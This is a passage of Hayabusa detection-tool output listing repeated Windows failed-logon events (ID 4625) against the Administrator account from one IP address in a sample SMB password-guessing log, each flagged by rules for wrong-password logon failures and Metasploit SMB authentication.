Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cHgiB5SMiQtsl5oD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 03e7QOn36l0jH35H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DoJBywV8x8cURwrO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.548 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.583 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SDYGYO6s6g6Dbx8r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.583 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nUqXpeTNePFyBmCo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.621 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T2h0qJWcbzRe1GSj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: edsfNOovOl1Ow503 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cxCC83XLMIJrNMvl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.740 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MzussOcg5ihdrnD0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.785 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 55l4HKICu8x0FpQv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5GmlVWDjZ75tT08G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.891 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6v1DkuFvB04PESQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VTLdNb0XbzXuLi51 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.977 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CSjDYb1BhHC9UTxO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.054 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1yLH19VsfLx9BGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.054 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X4AVhjdz9yHsfss0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bqWLOKaKwS8VBxDj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.133 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EjK8A8DTSYursBzj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.181 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UaDCKPslwRaLBWtH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.274 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xAvoekviFDSAIgBe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.274 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.310 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3XOmFwh8IamESWCM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.310 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 54GbW769j1x27mrI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.394 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bZSkhwZXc1SSknDT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.394 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 05AuqlN44x7oJGoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.435 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RQ4A6ReTVTcFCFeN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T7U6i4CMrL0bHouf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NaeA4uZ6o8BRbzwf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.626 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MEnlL5BHmlCrtk7p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.626 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KRNMpwAAaTsyzPfR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oBtHQkRWIoq5hfn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.709 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5pkk9lgqMQ4wxQel : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yQVan7kRDOlnim50 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9282GqsC7UiUMbRl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.857 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3lj7GjYryW9wjGgS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MPy4iUy5WBSLUBdy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.990 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0kvD9DEuos8SRrLH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NH1EnMG6fTvcz4QR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.131 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cqHDXSQn8gkl2LJy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.131 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RWI9XDDHjs2xcNB7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zo53mEz6nal5Gxff : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.210 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jtOgC6wqMoNYVxId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdadoJYvD7DYjlSG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U1xjdqjT9h0KUqG2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.341 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QfkzZBvO4onYx6JZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JqY8CvyODDLQV9Ps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nPMRIxRVuh13jmZD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jARkTWdKTfTIwlug : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 